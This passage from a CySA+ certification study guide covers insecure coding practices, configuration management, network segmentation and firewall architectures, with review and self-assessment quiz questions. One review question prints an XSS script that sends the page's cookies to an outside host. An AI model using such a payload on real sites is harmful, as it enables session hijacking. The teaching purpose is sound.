easy. In the case of passwords, a generally accepted rule is to not hard-code passwords (although this was not always standard practice). If passwords must be included in application code, they should be protected using encryption, which makes them difficult to reverse or discover, though also difficult to change.
Storing this type of sensitive data in a configuration file also
presents problems. Such files are usually discoverable, and even
if they are hidden, they can be discovered by using a demo
version of the software if it is a standard or default location.
Whatever method you use, give significant thought to protecting
these sensitive forms of data. The following measures can help
you prevent disclosure of sensitive information from storage:
Ensure that memory locations where this data is stored are locked
memory.
Ensure that ACLs attached to sensitive data are properly
configured.
Implement an appropriate level of encryption.
Insecure Components
There are two types of components, physical and software. The
emphasis in this section is on software components. An insecure
software component is a set of code that performs a particular
function as a part of a larger system, but does so in a way that
creates vulnerabilities.
The U.S. Department of Homeland Security has estimated that
90% of software components are downloaded from code
repositories. These repositories hold code that can be reused.
Using these repositories speeds software development because
it eliminates the time it would take to create these components
from scratch. Organizations might have their own repository for
in-house code that has been developed.
In other cases, developers may make use of a third-party
repository in which the components are sold. Vulnerabilities exist in much of the code found in third-party repositories.
Many have been documented and disclosed as Common
Vulnerabilities and Exposures (CVEs). In many cases these
vulnerabilities have been addressed and updates have been
uploaded to the repository. The problem is that far too many
vulnerabilities have not been addressed, and even in cases
where they have, developers continue to use the vulnerable
components instead of downloading the new versions.
Developers who do rely on third-party repositories must also
keep track of the components’ updates and security profiles.
Code Reuse
Not all code reuse comes from a third party. In some cases,
organizations maintain an internal code repository. The
Financial Services Information Sharing and Analysis Center
(FS-ISAC), an industry forum for collaboration on critical
security threats facing the global financial services sector,
recommends the following measures to reduce the risk of
reusing components in general:
Developers must apply policy controls during the acquisition
process as the most proactive type of control for addressing the
security vulnerabilities in open-source libraries.
Manage risk by using controlled internal repositories to provision
open-source components and block the ability to download
components directly from the Internet.
Insufficient Logging and Monitoring
If the authentication system is broken, then the front door is
open. If there is insufficient logging and monitoring, you don’t
even know that someone came through the front door! One of
the challenges of staying on top of log review is the
overwhelming feeling that other “things” are more important.
Even when time is allotted, in many cases the sheer amount of data to analyze is intimidating.
Audit reduction tools are preprocessors designed to reduce the
volume of audit records to facilitate manual review. Before a
security review, these tools can remove many audit records
known to have little security significance. These tools generally
remove records generated by specified classes of events, such as
records generated by nightly backups. Some technicians make
use of scripts for this purpose. One such Perl script called
swatch (the “Simple WATCHer”) is used by many Linux
technicians.
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement a security information and event management
(SIEM) system, which provides an automated solution for
analyzing events and deciding where the attention needs to be
given. In Chapter 11, “Analyzing Data As Part of Security
Monitoring Activities,” you will learn more about SIEM.
Weak or Default Configurations
A default configuration is one where the settings from the
factory have not been changed. This can allow for insecure
settings because many vendors adopt security settings that will
provide functionality in the largest number of scenarios.
Functionality and security are two completely different goals
and are not always compatible. Software settings should not be
left to the defaults and should be analyzed for the best
configuration for the scenario.
Misconfigurations are settings that depart from the defaults but
are still insecure. Some of the largest breaches have occurred
due to these “mistakes.” One of the ways to gain some control
over this process is to implement a configuration management
system.
Although it’s really a subset of change management,
configuration management specifically focuses on
bringing order out of the chaos that can occur when multiple
engineers and technicians have administrative access to the
computers and devices that make the network function. The
functions of configuration management are as follows:
Report the status of change processing.
Document the functional and physical characteristics of each
configuration item.
Perform information capture and version control.
Control changes to the configuration items, and issue versions of
configuration items from the software library.
Note
In the context of configuration management, a software library is a controlled
area accessible only to approved users who are restricted to the use of an
approved procedure. A configuration item (CI) is a uniquely identifiable subset of
the system that represents the smallest portion to be subject to an independent
configuration control procedure. When an operation is broken into individual CIs,
the process is called configuration identification.
Examples of these types of changes are as follows:
Operating system configuration
Software configuration
Hardware configuration
The biggest contribution of configuration management controls
is ensuring that changes to the system do not unintentionally
diminish security. Because of this, all changes must be
documented, and all network diagrams, both logical and
physical, must be updated constantly and consistently to
accurately reflect the state of each configuration now and not as
it was two years ago. Verifying that all configuration
management policies are being followed should be an ongoing
process.
In many cases it is beneficial to form a configuration control
board. The tasks of the configuration control board can include
the following:
Ensuring that changes made are approved, tested, documented, and
implemented correctly.
Meeting periodically to discuss configuration status accounting
reports.
Maintaining responsibility for ensuring that changes made do not
jeopardize the soundness of the verification system.
In summary, the components of configuration management are
as follows:
Configuration control
Configuration status accounting
Configuration audit
Use of Insecure Functions
Software developers use functions to make things happen in
software. Some functions are more secure than others (although
some programmers will tell you they are all safe if used
correctly). Developers should research, identify, and avoid those
functions that are known to cause security issues.
strcpy
One function that has a reputation for issues is the strcpy
function in C++. It copies the C string pointed to by source into
the array pointed to by destination, including the terminating null
character (and stopping at that point). The issue is that if the
destination is not long enough to contain the string, an overrun
occurs.
To avoid overflows, the array pointed to by destination must be
long enough to contain the same C string as source (including
the terminating null character) and must not overlap in memory
with source.
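The following short C++ sketch illustrates the problem and one safer pattern. The buffer sizes and strings are illustrative only; snprintf is shown as one common alternative because it never writes more than the stated destination size.

// strcpy_demo.cpp: why strcpy can overrun, and a bounded alternative.
#include <cstdio>
#include <cstring>

int main() {
    const char* source = "a string longer than eight bytes";

    char unsafe_dest[8];
    (void)unsafe_dest;               // unused on purpose; see comment below
    // strcpy(unsafe_dest, source);  // undefined behavior: strcpy would write
    //                               // past the 8-byte buffer -- an overflow

    char safe_dest[8];
    // snprintf writes at most sizeof(safe_dest) bytes and always
    // null-terminates, truncating the copy instead of overrunning.
    std::snprintf(safe_dest, sizeof(safe_dest), "%s", source);
    std::printf("%s\n", safe_dest);  // prints the truncated "a strin"
    return 0;
}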
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 7-3
lists a reference of these key topics and the page numbers on
which each is found.
Table 7-3 Key Topics in Chapter 7
Key Topic Element | Description | Page Number
Bulleted list | Criteria used by XACML to provide fine-grained control | 143
Bulleted list | XACML components | 144
Figure 7-2 | XACML flow | 145
Figure 7-3 | SQL injection | 146
Example 7-1 | Log entry with SQL injection attack | 146
Bulleted list | SQL injection prevention measures | 146
Example 7-2 | Packet with NOP slide within | 147
Example 7-3 | Buffer overflow attack | 149
Bulleted list | Mitigating integer overflow attacks | 149
Figure 7-4 | Heap overflow | 150
Figure 7-5 | Remote code execution | 151
Figure 7-6 | Directory traversal | 151
Bulleted list | Privilege escalation | 152
Figure 7-7 | Password spraying | 153
Figure 7-8 | Credential stuffing | 153
Bulleted list | Preventing credential stuffing | 154
Bulleted list | Mitigating ARP poisoning | 154
Figure 7-12 | Session hijack | 159
Bulleted list | Actions a rootkit can take | 159
Bulleted list | Rootkit prevention | 160
Figure 7-13 | High-level view of a typical XSS attack | 160
Figure 7-14 | Reflected XSS attack | 161
Figure 7-15 | Persistent XSS attack | 162
Figure 7-16 | DOM-based XSS attack | 162
Bulleted list | Measures to prevent disclosure of sensitive information | 165
Bulleted list | Measures to reduce risk from reusing components | 166
Bulleted list | Functions of configuration management | 167
Bulleted list | Configuration control board tasks | 168
Bulleted list | Components of configuration management | 168
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Extensible Markup Language (XML) attack
eXtensible Access Control Markup Language (XACML)
policy enforcement point (PEP)
policy decision point (PDP)
Structured Query Language (SQL) injection
overflow attacks
buffer overflow
integer overflow
heap overflows
remote code execution
directory traversal
privilege escalation
password spraying
credential stuffing
man-in-the-middle attack
Dynamic ARP Inspection (DAI)
DHCP snooping
session hijacking
rootkit
cross-site scripting (XSS)
reflective XSS
persistent XSS
DOM XSS
dereference
insecure object reference
race condition
strcpy
REVIEW QUESTIONS
1. In XACML, the entity that is protecting the resource that the
subject (a user or an application) is attempting to access is
called the ____________.
2. Match the following terms with their definitions.
Term | Definition
XACML | Type of attack that can result in reading sensitive data from the database, modifying database data, and executing administrative operations on the database
PDP | When an area of memory of some sort is full and can hold no more information
SQL injection | Retrieves all applicable policies in XACML and compares the request with the policies
Overflow | A standard for an access control policy language using XML
3. List at least one of the criteria used by XACML to provide
for fine-grained control of activities.
4. _________________________ occurs when math
operations try to create a numeric value that is too large for
the available space.
5. Match the following terms with their definitions.
Term | Definition
Heap | One of the ways malicious individuals are able to access parts of a directory to which they should not have access
Directory traversal | Technique used to identify the passwords of domain users
Password spraying | Feature that can prevent man-in-the-middle attacks
Dynamic ARP Inspection (DAI) | An area of memory that can be increased or decreased in size
6. List at least one way that sessions can be hijacked.
7. What is the following script designed to do?
<SCRIPT>document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie</SCRIPT>
8. Match the following terms with their definitions.
Term | Definition
Improper error handling | Can allow an attacker to use the resulting exception to bypass security logic
Dereferencing | Can cause disclosure of information
Race condition | Configuration in which settings from the factory have not been changed
Default configuration | An attack in which the hacker inserts himself between instructions, introduces changes, and alters the order of execution of the instructions, thereby altering the outcome
9. List at least one of the functions of configuration
management.
10. ____________________ is a function that has a
reputation for issues in C++.
Chapter 8
Security Solutions for Infrastructure Management
This chapter covers the following topics related to Objective 2.1
(Given a scenario, apply security solutions for infrastructure
management) of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
Cloud vs. on-premises: Discusses the two main infrastructure
models: cloud vs. on-premises.
Asset management: Covers issues surrounding asset
management including asset tagging.
Segmentation: Describes physical and virtual segmentation,
jumpboxes, and system isolation with an air gap.
Network architecture: Covers physical, software-defined, virtual
private cloud (VPC), virtual private network (VPN), and serverless
architectures.
Change management: Discusses the formal change management
processes.
Virtualization: Focuses on virtual desktop infrastructure (VDI).
Containerization: Discusses an alternate form of virtualization.
Identity and access management: Explores privilege
management, multifactor authentication (MFA), single sign-on
(SSO), federation, role-based access control, attribute-based access
control, mandatory access control, and manual review.
Cloud access security broker (CASB): Discusses the role of
CASBs.
Honeypot: Covers placement and use of honeypots.
Monitoring and logging: Explains monitoring and logging
processes.
Encryption: Introduces important types of encryption.
Certificate management: Discusses issues critical to managing
certificates.
Active defense: Discusses defensive strategy in the cybersecurity
arena.
Over the years, security solutions have been adopted,
discredited, and replaced as technology changes. Cybersecurity
professionals must know and understand the pros and cons of
various approaches to protect the infrastructure. This chapter
examines both old and new solutions.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 14 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 8-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 8-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Question
Cloud vs. On-premises | 1
Asset Management | 2
Segmentation | 3
Network Architecture | 4
Change Management | 5
Virtualization | 6
Containerization | 7
Identity and Access Management | 8
Cloud Access Security Broker (CASB) | 9
Honeypot | 10
Monitoring and Logging | 11
Encryption | 12
Certificate Management | 13
Active Defense | 14
1. Which statement is false with respect to multitenancy in a
cloud?
1. It can lead to allowing another tenant or attacker to see others’
data or to assume the identity of other clients.
2. It prevents residual data of former tenants from being exposed in
storage space assigned to new tenants.
3. Users may lose access due to inadequate redundancy and fault-tolerance measures.
4. Shared ownership of data with the customer can limit the legal
liability of the provider.
2. Which of the following involves marking a video, photo, or
other digital media with a GPS location?
1. TAXII
2. Geotagging
3. Geofencing
4. RFID
3. Which of the following is a network logically separate from
the other networks where resources that will be accessed
from the outside world are made available to only those that
are authenticated?
1. Intranet
2. DMZ
3. Extranet
4. Internet
4. Which of the following terms refers to any device exposed
directly to the Internet or to any untrusted network?
1. Screened subnet
2. Three-legged firewall
3. Bastion host
4. Screened host
5. Which statement is false regarding the change management
process?
1. All changes should be formally requested.
2. Each request should be approved as quickly as possible.
3. Prior to formal approval, all costs and effects of the methods of
implementation should be reviewed.
4. After they’re approved, the change steps should be developed.
6. Which of the following is installed on hardware and is
considered “bare metal”?
1. Type 1 hypervisor
2. VMware Workstation
3. Type 2 hypervisor
4. Oracle VirtualBox
7. Which of the following is a technique in which the kernel
allows for multiple isolated user space instances?
1. Containerization
2. Segmentation
3. Affinity
4. Secure Boot
8. Which of the following authentication factors represents
something a person is?
1. Knowledge factor
2. Ownership factor
3. Characteristic factor
4. Location factor
9. Which of the following is a software layer that operates as a
gatekeeper between an organization’s on-premises network
and the provider’s cloud environment?
1. Virtual router
2. CASB
3. Honeypot
4. Black hole
10. Which of the following is the key purpose of a honeypot?
1. Loss minimization
2. Information gathering
3. Confusion
4. Retaliation
11. Which of the following relates to logon and information
security continuous monitoring?
1. IEEE 802.ac
2. ISO/IEC 27017
3. NIST SP 800-137
4. FIPS
12. Which of the following cryptographic techniques provides
the best method of ensuring integrity and determines if data
has been altered?
1. Encryption
2. Hashing
3. Digital signature
4. Certificate pinning
13. Which of the following PKI components verifies the
requestor’s identity and registers the requestor?
1. TA
2. CA
3. RA
4. BA
14. Which of the following is a new approach to security that is
offensive in nature rather than defensive?
1. Hunt teaming
2. White teaming
3. Blue teaming
4. APT
FOUNDATION TOPICS
CLOUD VS. ON-PREMISES
Accompanying the movement to virtualization is a movement
toward the placement of resources in a cloud environment.
While the cloud allows users to access the resources from
anywhere they can get Internet access, it presents a security
landscape that differs from the security landscape of your onpremises resources. For one thing, a public cloud solution relies
on the security practices of the provider.
These are the biggest risks you face when placing resources in a
public cloud:
Multitenancy can lead to the following:
Allowing another tenant or attacker to see others’ data or to
assume the identity of other clients
Residual data of former tenants exposed in storage space
assigned to new tenants
The use of virtualization in cloud environments leads to the same
issues covered later in this chapter in the section “Virtualization.”
Mechanisms for authentication and authorization may be improper
or inadequate.
Users may lose access due to inadequate redundancy and fault-tolerance measures.
Shared ownership of data with the customer can limit the legal
liability of the provider.
The provider may use data improperly (such as data mining).
Data jurisdiction is an issue: Where does the data actually reside,
and what laws affect it, based on its location?
Cloud Mitigations
Over time, best practices have emerged to address both cloud
and on-premises environments. With regard to the cloud, it is
incumbent on the customer to take an active role in ensuring
security by doing the following:
Understand you share responsibility for security with the vendor
Ask, don’t assume, with regard to detailed security questions
Deploy an identity and access management solution that supports
cloud
Train your staff
Establish and enforce cloud security policies
Consider a third-party partner if you don’t have the skill sets to
protect yourself
ASSET MANAGEMENT
Asset management and inventory control across the technology
life cycle are critical to ensuring that assets are not stolen or lost
and that data on assets is not compromised in any way. Asset
management and inventory control are two related areas. Asset
management involves tracking the devices that an organization
owns, and inventory control involves tracking and containing
inventory. All organizations should implement asset
management, but not all organizations need to implement
inventory control.
Asset Tagging
Asset tagging is the process of placing physical identification
numbers of some sort on all assets. This can be as simple as a
small label that identifies the asset and the owner, as shown in
Figure 8-1.
Figure 8-1 Asset Tag
Asset tagging can also be part of a more robust asset-tracking
system when implemented in such a way that the device can be
tracked and located at any point in time. Let’s delve into the
details of such systems.
Device-Tracking Technologies
Device-tracking technologies allow organizations to determine
the location of a device and also often allow the organization to
retrieve the device. However, if the device cannot be retrieved, it
may be necessary to wipe the device to ensure that the data on
the device cannot be accessed by unauthorized users. As a
security practitioner, you should stress to your organization the
need to implement device-tracking technologies and remote-wiping capabilities.
Geolocation/GPS Location
Device-tracking technologies include geolocation, or Global
Positioning System (GPS) location. With this technology,
location and time information about an asset can be tracked,
provided that the appropriate feature is enabled on the device.
For most mobile devices, the geolocation or GPS location
feature can be enhanced through the use of Wi-Fi networks. A
security practitioner must ensure that the organization enacts
mobile device security policies that include the mandatory use
of GPS location features. In addition, it will be necessary to set
up appropriate accounts that allow personnel to use the
vendor’s online service for device location. Finally, remote-locking and remote-wiping features should be seriously
considered, particularly if the mobile devices contain
confidential or private information.
Object-Tracking and Object-Containment Technologies
Object-tracking and object-containment technologies are
primarily concerned with ensuring that inventory remains
within a predefined location or area. Object-tracking
technologies allow organizations to determine the location of
inventory. Object-containment technologies alert personnel
within the organization if inventory has left the perimeter of the
predefined location or area.
For most organizations, object-tracking and object-containment
technologies are used only for inventory assets above a certain
value. For example, most retail stores implement object-containment technologies for high-priced electronics devices
and jewelry. However, some organizations implement these
technologies for all inventory, particularly in large warehouse
environments.
Technologies used in this area include geotagging/geofencing
and RFID.
Geotagging/Geofencing
Geotagging involves marking a video, photo, or other digital
media with a GPS location. This feature has received criticism
recently because attackers can use it to pinpoint personal
information, such as the location of a person’s home. However,
for organizations, geotagging can be used to create location-based news and media feeds. In the retail industry, geotagging
can be helpful for allowing customers to locate a store where a
specific piece of merchandise is available.
Geofencing uses the GPS to define geographical boundaries. A
geofence is a virtual barrier, and alerts can occur when
inventory enters or exits the boundary. Geofencing is used in
retail management, transportation management, human
resources management, law enforcement, and other areas.
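As a simple illustration of the boundary check at the heart of geofencing, the following C++ sketch tests whether a reported GPS fix lies inside a circular fence using the haversine great-circle distance. The coordinates, radius, and names are hypothetical; real geofencing products typically support arbitrary polygon boundaries and event streams.

// geofence.cpp: minimal circular geofence check (illustrative only).
#include <cmath>
#include <cstdio>

constexpr double kPi = 3.14159265358979323846;

// Great-circle distance in meters between two lat/lon points (haversine).
double haversine_m(double lat1, double lon1, double lat2, double lon2) {
    constexpr double kEarthRadiusM = 6371000.0;  // mean Earth radius
    auto rad = [](double deg) { return deg * kPi / 180.0; };
    const double dlat = rad(lat2 - lat1);
    const double dlon = rad(lon2 - lon1);
    const double a = std::sin(dlat / 2) * std::sin(dlat / 2) +
                     std::cos(rad(lat1)) * std::cos(rad(lat2)) *
                     std::sin(dlon / 2) * std::sin(dlon / 2);
    return 2.0 * kEarthRadiusM * std::asin(std::sqrt(a));
}

int main() {
    // Hypothetical fence: 200 m around a fixed warehouse coordinate.
    const double fence_lat = 40.7128, fence_lon = -74.0060, radius_m = 200.0;
    const double asset_lat = 40.7150, asset_lon = -74.0060;  // reported fix

    const double d = haversine_m(fence_lat, fence_lon, asset_lat, asset_lon);
    if (d > radius_m)
        std::printf("ALERT: asset is %.0f m outside the geofence\n",
                    d - radius_m);
    else
        std::printf("asset is inside the geofence (%.0f m from center)\n", d);
    return 0;
}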
RFID
Radio frequency identification (RFID) uses radio
frequency chips and readers to manage inventory. The chips are
placed on individual pieces or pallets of inventory. RFID readers
are placed throughout the location to communicate with the
chips. Identification and location information are collected as
part of the RFID communication. Organizations can customize
the information that is stored on an RFID chip to suit their
needs.
Two types of RFID systems can be deployed: active
reader/passive tag (ARPT) and active reader/active tag (ARAT).
In an ARPT system, the active reader transmits signals and
receives replies from passive tags. In an ARAT system, active
tags are woken with signals from the active reader.
RFID chips can be read only if they are within a certain
proximity of the RFID reader. A recent implementation of RFID
chips is the Walt Disney MagicBand, which is issued to visitors
at Disney resorts and theme parks. The band verifies park
admission and allows visitors to reserve attraction and restaurant
times and pay for purchases in the resort.
Different RFID systems are available for different wireless
frequencies. If your organization decides to implement RFID, it
is important that you fully research the advantages and
disadvantages of different frequencies.
SEGMENTATION
One of the best ways to protect sensitive resources is to utilize
network segmentation. When you segment a network, you
create security zones that are separated from one another by
devices such as firewalls and routers that can be used to control
the flow of traffic between the zones.
Physical
Physical segmentation is a tried and true method of
segmentation. While in general there is no limit to the number
of zones you can create, most networks have the zone types
discussed in the following sections.
LAN
Let’s talk about what makes a local-area network (LAN) local.
Although classically we think of a LAN as a network located in
one location, such as a single office, referring to a LAN as a
group of systems that are connected with a fast connection is
more correct. For purposes of this discussion, that is any
connection over 10 Mbps. This might not seem very fast to you,
but it is fast compared to a wide-area network (WAN). Even a
T1 connection is only 1.544 Mbps. Using this as our yardstick, if
a single campus network has a WAN connection between two
buildings, then the two networks are considered two LANs
rather than a single LAN. In most cases, however, networks in a
single campus are typically not connected with a WAN
connection, which is why usually you hear a LAN defined as a
network in a single location.
Intranet
Within the boundaries of a single LAN, there can be
subdivisions for security purposes. The LAN might be divided
into an intranet and an extranet. The intranet is the internal
network of the enterprise. It is considered a trusted network
and typically houses any sensitive information and systems and
should receive maximum protection with firewalls and strong
authentication mechanisms.
Extranet
An extranet is a network logically separate from the intranet
where resources that will be accessed from the outside world are
made available to authorized, authenticated third parties.
Access might be granted to customers or business partners. All
traffic between the extranet and the intranet should be closely
monitored and securely controlled. Nothing of a sensitive
nature should be placed in the extranet.
DMZ
Like an extranet, a demilitarized zone (DMZ) is a network
logically separate from the intranet where resources that will be
accessed from the outside world are made available. The
difference is that usually an extranet contains resources
available only to certain entities from the outside world, and
access is secured with authentication, whereas a DMZ usually
contains resources available to everyone from the outside world,
without authentication. A DMZ might contain web servers,
email servers, or DNS servers. Figure 8-2 shows the relationship
between intranet, extranet, Internet, and DMZ networks.
FIGURE 8-2 Network Segmentation
Virtual
While all the network segmentation components discussed thus
far separate networks physically with devices such as routers
and firewalls, a virtual local-area network (VLAN)
separates them logically. Enterprise-level switches are capable
of creating VLANs. These are logical subdivisions of a switch
that segregate ports from one another as if they were in
different LANs. VLANs can also span multiple switches,
meaning that devices connected to switches in different parts of
a network can be placed in the same VLAN, regardless of
physical location.
A VLAN adds a layer of separation between sensitive devices
and the rest of the network. For example, if only two devices
should be able to connect to the HR server, the two devices and
the HR server could be placed in a VLAN separate from the
other VLANs. Traffic between VLANs can only occur through a
router. Routers can be used to implement access control lists
(ACLs) that control the traffic allowed between VLANs. Figure
8-3 shows an example of a network with VLANs.
FIGURE 8-3 VLANs
VLANs can be used to address threats that exist within a
network, such as the following:
DoS attacks: When you place devices with sensitive information
in a separate VLAN, they are shielded from both Layer 2 and Layer
3 DoS attacks from devices that are not in that VLAN. Because
many of these attacks use network broadcasts, if they are in a
separate VLAN, they will not receive broadcasts unless they
originate from the same VLAN.
Unauthorized access: While permissions should be used to
secure resources on sensitive devices, placing those devices in a
secure VLAN allows you to deploy ACLs on the router to allow only
authorized users to connect to the device.
Jumpbox
A jumpbox, or jump server, is a server that is used to access
devices that have been placed in a secure network zone such as
a DMZ. The server would span the two networks to provide
access from an administrative desktop to the managed device.
Secure Shell (SSH) tunneling is the de facto method
of access. Administrators can use multiple zone-specific
jumpboxes to access what they need, and lateral access between
servers is prevented by whitelists. This helps prevent the types
of breaches suffered by both Target and Home Depot, in which
lateral access was used to move from one compromised device
to other servers. Figure 8-4 shows a jumpbox (jump server)
arrangement.
Figure 8-4 Jumpboxes
A jumpbox arrangement can avoid the following issues:
Breaches that occur from lateral access
Inappropriate administrative access of sensitive servers
System Isolation
While the safest device is one that is not connected to any
networks, disconnecting devices is typically not a workable
solution if you need to access the data on a system. However,
there are some middle-ground solutions between total isolation
and total access. Systems can be isolated from other systems
through the control of communications with the device. An
example of system isolation is through the use of Microsoft
server isolation. By leveraging Group Policy (GP) settings, you
can require that all communication with isolated servers must
be authenticated and protected (and optionally encrypted as
well) by using IPsec. As Group Policy settings can only be
applied to computers that are domain members, computers that
are not domain members must be specified as exceptions to the
rules controlling access to the device if they need access. Figure
8-5 shows the results of three different types of devices
attempting to access an isolated server. The non-domain device
(unmanaged) cannot connect, while the unmanaged device that
has been excepted can, and the domain member that lies within
the isolated domain can also.
FIGURE 8-5 Server Isolation
The device that is a domain member (Computer1) with the
proper Group Policy settings to establish an authenticated
session is allowed access. The computer that is not a domain
member but has been excepted is allowed an unauthenticated
session. Finally, a device missing the proper GP settings to
establish an authenticated session is not allowed access. This is
just one example of how devices can be isolated.
Air Gap
In cases where data security concerns are extreme, it may even
be advisable to protect the underlying system with an air gap.
This means the device has no network connections and all
access to the system must be done manually by adding and
removing items such as updates and patches with a flash drive
or other external device.
Any updates to the data on the device must be done manually,
using external media. An example of when it might be
appropriate to do so is in the case of a certificate authority (CA)
root server. If a root CA is in some way compromised (broken
into, hacked, stolen, or accessed by an unauthorized or
malicious person), all the certificates that were issued by that
CA are also compromised.
NETWORK ARCHITECTURE
Network architecture refers not only to the components that are
arranged and connected to one another (physical architecture)
but also to the communication paths the network uses (logical
architecture). This section surveys security considerations for a
number of different architectures that can be implemented both
physically and virtually.
Physical
The physical network comprises the physical devices and their
connections to one another. The physical network in many cases
serves as an underlay or carrier for higher-level network
processes and protocols.
Security practitioners must understand two main types of
enterprise deployment diagrams:
Logical deployment diagram: Shows the architecture, including
the domain architecture, with the existing domain hierarchy,
names, and addressing scheme; server roles; and trust
relationships.
Physical deployment diagram: Shows the details of physical
communication links, such as cable length, grade, and wiring paths;
servers, with computer name, IP address (if static), server role, and
domain membership; device location, such as printer, hub, switch,
modem, router, or bridge, as well as proxy location; communication
links and the available bandwidth between sites; and the number of
users, including mobile users, at each site.
A logical diagram usually contains less information than a
physical diagram. While you can often create a logical diagram
from a physical diagram, it is nearly impossible to create a
physical diagram from a logical one.
Figure 8-6 shows an example of a logical network diagram.
Figure 8-6 Logical Network Diagram
As you can see, the logical network diagram shows only a few of
the servers in the network, the services they provide, their IP
addresses, and their DNS names. The relationships between the
different servers are shown by the arrows between them. Figure
8-7 shows an example of a physical network diagram.
FIGURE 8-7 Physical Network Diagram
A physical network diagram gives much more information than
a logical one, including the cabling used, the devices on the
network, the pertinent information for each server, and other
connection information.
Note
CySA+ firewall-related objectives including firewall logs, web application
firewalls (WAFs), and implementing configuration changes to firewalls are
covered later in the book in Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
Firewall Architecture
Whereas the type of firewall speaks to the internal operation of
the firewall, the architecture refers to the way in which firewalls
are deployed in the network to form a system of protection. The
following sections look at the various ways firewalls can be
deployed.
Bastion Hosts
A bastion host may or may not be a firewall. The term actually
refers to the position of any device. If the device is exposed
directly to the Internet or to any untrusted network while
screening the rest of the network from exposure, it is a bastion
host. Some other examples of bastion hosts are FTP servers,
DNS servers, web servers, and email servers. In any case where
a host must be publicly accessible from the Internet, the device
must be treated as a bastion host, and you should take the
following measures to protect these machines:
Disable or remove all unnecessary services, protocols, programs,
and network ports.
Use authentication services separate from those of the trusted hosts
within the network.
Remove as many utilities and system configuration tools as is
practical.
Install all appropriate service packs, hotfixes, and patches.
Encrypt any local user account and password databases.
A bastion host can be located in the following locations:
Behind the exterior and interior firewalls: Locating it here
and keeping it separate from the interior network complicates the
configuration but is safest.
Behind the exterior firewall only: Perhaps the most common
location for a bastion host is separated from the internal network;
this is a less complicated configuration. Figure 8-8 shows an
example in which there are two bastion hosts: the FTP/WWW
server and the SMTP/DNS server.
As both the exterior firewall and a bastion host: This setup
exposes the host to the most danger.
Figure 8-8 Bastion Hosts in a Screened Subnet
Dual-Homed Firewalls
A dual-homed firewall has two network interfaces: one
pointing to the internal network and another connected to the
untrusted network. In many cases, routing between these
interfaces is turned off. The firewall software allows or denies
traffic between the two interfaces based on the firewall rules
configured by the administrator. The following are some of the
advantages of this setup:
The configuration is simple.
It is possible to perform IP masquerading (NAT).
It is less costly than using two firewalls.
Disadvantages include the following:
There is a single point of failure.
It is not as secure as other options.
Figure 8-9 shows a dual-homed firewall (also called a dual-homed host) location.
Figure 8-9 Location of Dual-Homed Firewall
Multihomed Firewall
A firewall can be multihomed. One popular type of
multihomed firewall is the three-legged firewall. In this
configuration, there are three interfaces: one connected to the
untrusted network, one connected to the internal network, and
one connected to a DMZ. As mentioned earlier in this chapter, a
DMZ is a protected network that contains systems needing a
higher level of protection. The advantages of a three-legged
firewall include the following:
It offers cost savings on devices because you need only one firewall
and not two or three.
It is possible to perform IP masquerading (NAT) on the internal
network while not doing so for the DMZ.
Among the disadvantages are the following:
The complexity of the configuration is increased.
There is a single point of failure.
The location of a three-legged firewall is shown in Figure 8-10.
Figure 8-10 Location of a Three-legged Firewall
Screened Host Firewalls
A screened host firewall is located between the final router
and the internal network. The advantages to a screened host
firewall solution include the following:
It offers more flexibility than a dual-homed firewall because rules
rather than an interface create the separation.
Potential cost savings.
The disadvantages include the following:
The configuration is more complex.
It is easier to violate the policies than with dual-homed firewalls.
Figure 8-11 shows the location of a screened host firewall.
Figure 8-11 Location of a Screened Host Firewall
Screened Subnets
In a screened subnet, two firewalls are used, and traffic must
be inspected at both firewalls before it can enter the internal
network. The advantages of a screened subnet include the
following:
It offers the added security of two firewalls before the internal
network.
One firewall is placed before the DMZ, protecting the devices in the
DMZ.
Disadvantages include the following:
It is more costly than using either a dual-homed or three-legged
firewall.
Configuring two firewalls adds complexity.
Figure 8-12 shows the placement of the firewalls to create a
screened subnet. The router is acting as the outside firewall, and
the firewall appliance is the second firewall. In any situation
where multiple firewalls are in use, such as an active/passive
cluster of two firewalls, care should be taken to ensure that TCP
sessions are not traversing one firewall while return traffic of
the same session is traversing the other. When stateful filtering
is being performed, the return traffic will be denied, which will
break the user connection. In the real world, various firewall
approaches are mixed and matched to meet requirements, and
you may find elements of all these architectural concepts being
applied to a specific situation.
FIGURE 8-12 Location of a Screened Subnet
Software-Defined Networking
In a network, three planes typically form the networking
architecture:
Control plane: This plane carries signaling traffic originating
from or destined for a router. This is the information that allows
routers to share information and build routing tables.
Data plane: Also known as the forwarding plane, this plane
carries user traffic.
Management plane: This plane administers the router.
Software-defined networking (SDN) has been classically
defined as the decoupling of the control plane and the data
plane in networking. In a conventional network, these planes
are implemented in the firmware of routers and switches. SDN
implements the control plane in software, which enables
programmatic access to it.
This definition has evolved over time to focus more on
providing programmatic interfaces to networking equipment
and less on the decoupling of the control and data planes. An
example of this is the provision of application programming
interfaces (APIs) by vendors into the multiple platforms they
sell.
One advantage of SDN is that it enables very detailed access
into, and control over, network elements. It allows IT
organizations to replace a manual interface with a
programmatic one that can enable the automation of
configuration and policy management.
An example of the use of SDN is using software to centralize the
control plane of multiple switches that normally operate
independently. (While the control plane normally functions in
hardware, with SDN it is performed in software.) Figure 8-13
illustrates this concept.
FIGURE 8-13 Centralized and Decentralized SDN
The advantages of SDN include the following:
Mixing and matching solutions from different vendors is simple.
SDN offers choice, speed, and agility in deployment.
The following are disadvantages of SDN:
Loss of connectivity to the controller brings down the entire
network.
SDN can potentially allow attacks on the controller.
Virtual SAN
